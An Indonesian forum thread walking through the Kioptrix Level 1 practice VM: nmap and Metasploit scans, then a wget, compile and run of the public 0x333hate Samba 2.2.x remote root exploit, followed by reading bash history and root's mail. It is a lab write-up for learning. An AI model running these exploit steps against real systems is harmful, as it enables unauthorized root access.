NEW CONTENT RANDOM THREAD Unread Post

Pembahasan Kioptrix Level 1 : Samba Exploit

by Aiden_ - 03-10-2016 at 11:40 AM
Aiden_
From Nothing To Be Something
Moderators
Posts:
49
Joined:
Mar 2016
Likes:
0
Reputation:
0
2 Year Of Member
#1
OP
Posted: 03-10-2016, 11:40 AM (This post was last modified: 03-10-2016, 11:41 AM by Aiden_.)
[Image: Screenshot_2016-02-26_13-29-46.png]
Assalamualaikum...
Kioptrix Level 1 : Samba Exploit - untuk kesempatan kali ini saya akan membahas bagaimana mengexploit samba yang ada pada kiotrix server, kioptrix server adalah vulnerable os yang digunakan untuk tujuan pembelajaran dalam hal pentesting.

Tool Yang Dibutuhkan
  1. Nmap
  2. Metasploit
  3. Kioptrix Level 1 : Download disini
Mencari Ip Target

Dalam mencari ip target, saya menggunakan nmap dengan parameter -sn untuk melakukan Ping scan agar dapat mencari host yg live

Quote:root@ubuntu-linux:/home/aiden# nmap -sn 192.168.33.1/24

Starting Nmap 7.01 ( https://nmap.org ) at 2016-02-26 13:06 HKT
Nmap scan report for 192.168.33.128
Host is up (0.00042s latency).
MAC Address: 00:0C:29:83:B2:94 (VMware)
Nmap scan report for 192.168.33.254
Host is up (0.000044s latency).
MAC Address: 00:50:56:E2:65:F0 (VMware)
Nmap scan report for 192.168.33.1
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 30.30 seconds
Scanning Service Pada Server
Untuk pencarian service atau layanan yang sudah diinstall pada kiotrix server kita gunakan nmap dengan parameter -sV untuk melakukan service version scanning
Quote:root@ubuntu-linux:/home/aiden# nmap -sV 192.168.33.128

Starting Nmap 7.01 ( https://nmap.org ) at 2016-02-26 13:38 HKT
Nmap scan report for 192.168.33.128
Host is up (0.00022s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/http    Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:83:B2:94 (VMware)
Scanning Samba Version

Setelah melakukan service scanning kita lanjutkan dengan mencari versi dari samba yang sudah diinstall di kiotrix menggunakan modul auxiliary pada metasploit

Quote:msf > search smb_version

Matching Modules
================

   Name                               Disclosure Date  Rank    Description
   ----                               ---------------  ----    -----------
   auxiliary/scanner/smb/smb_version                   normal  SMB Version Detection

msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > show options

Module options (auxiliary/scanner/smb/smb_version):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target address range or CIDR identifier
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads

msf auxiliary(smb_version) > set RHOSTS 192.168.33.128
RHOSTS => 192.168.33.128
msf auxiliary(smb_version) > run

[*] 192.168.33.128:139 could not be identified: Unix (Samba 2.2.1a)
[*]Scanned 1 of 1 hosts (100% complete)
[*]Auxiliary module execution completed
[*]
Exploiting Samba

Kita tidak perlu bingung mau menggunakan exploit apa, karena samba 2.2.x memiliki exploit yang sudah dibuat yaitu 0x333hate => samba 2.2.x remote root exploit, sebenar nya bisa juga dengan trans2open exploit di metasploit, tapi karena metasploit saya lagi error jadi saya make 0x333hate yang base on trans2open.

~# wget http://downloads.securityfocus.com/vulne...x333hate.c
~# gcc 0x333hate.c -o xpl
~# ./xlp -t 192.168.33.1

kita sudah mendapatkan shell akses ke system kioptrix.

[Image: Screenshot_2016-02-27_19-58-32.png]


[*]

Ingat "Shell is Only the Beginning" , lalu apa yang harus dilakukan ? karena tidak ada clue, ane iseng mencari file .bash_history untuk melihat command apa aja yang pernah di ketik


[Image: Selection_003.png]


[*]

Ada commad mail yang digunakan untuk email proses
lalu tinggal ketik aja di shell nya

Quote:# mail  <-- untuk melihat list email
# exit <-- agar keluar dari perintah mail
# cat /var/mail/root



[Image: Screenshot%2Bfrom%2B2016-02-27%2B20-06-27.png]


[*]

Rupa nya isi email tersebut agar kita bisa lanjut ke level 2 kiotrix nya ^_^

sekian tutorial sederhana dari saya. semoga dapat bermanfaat bagi kita semua dan mohon maaf apa bila ada salah pemberian definisi :D
root@localhost:~# cat something.txt
Dompu Linuxer
I'm Nothing Without Allah
Message
Reply
Find Posts
teh
Junior Member
Posts:
33
Joined:
Mar 2016
Likes:
0
Reputation:
0
2 Year Of Member
#2
Posted: 03-10-2016, 02:50 PM
om ini install kioptrix nya di virtual yaa. .
Message
Reply
Find Posts
Aiden_
From Nothing To Be Something
Moderators
Posts:
49
Joined:
Mar 2016
Likes:
0
Reputation:
0
2 Year Of Member
#3
OP
Posted: 03-11-2016, 12:38 AM
(03-10-2016, 02:50 PM)teh Wrote: om ini install kioptrix nya di virtual yaa. .

iyaa bang harus itu
root@localhost:~# cat something.txt
Dompu Linuxer
I'm Nothing Without Allah
Message
Reply
Find Posts
teh
Junior Member
Posts:
33
Joined:
Mar 2016
Likes:
0
Reputation:
0
2 Year Of Member
#4
Posted: 03-11-2016, 01:18 PM
okee siip ane test dlu dah :D
Message
Reply
Find Posts
Register an account or login to reply
Create an account
Create a free account today and start posting right away. It only takes a few seconds.
Login
Log into an existing account.
1 Guest(s)
Navigation
Latest News
Bugtracker
Team
Mark forum as read
Community
Banlist
Usergroups
Memberlist
Statistics
Help/Account
Help Documents and Rules
Contact
Login
Create an account
About Us
Forum Backbox Indonesia adalah salah satu media pembelajaran bagi siapa saja yang ingin belajar mengenai dunia Open Source khususnya untuk memperdalam Backbox Linux.
Posts:
971
Members:
1322
Threads:
199
Resources:
0
New :
spongebob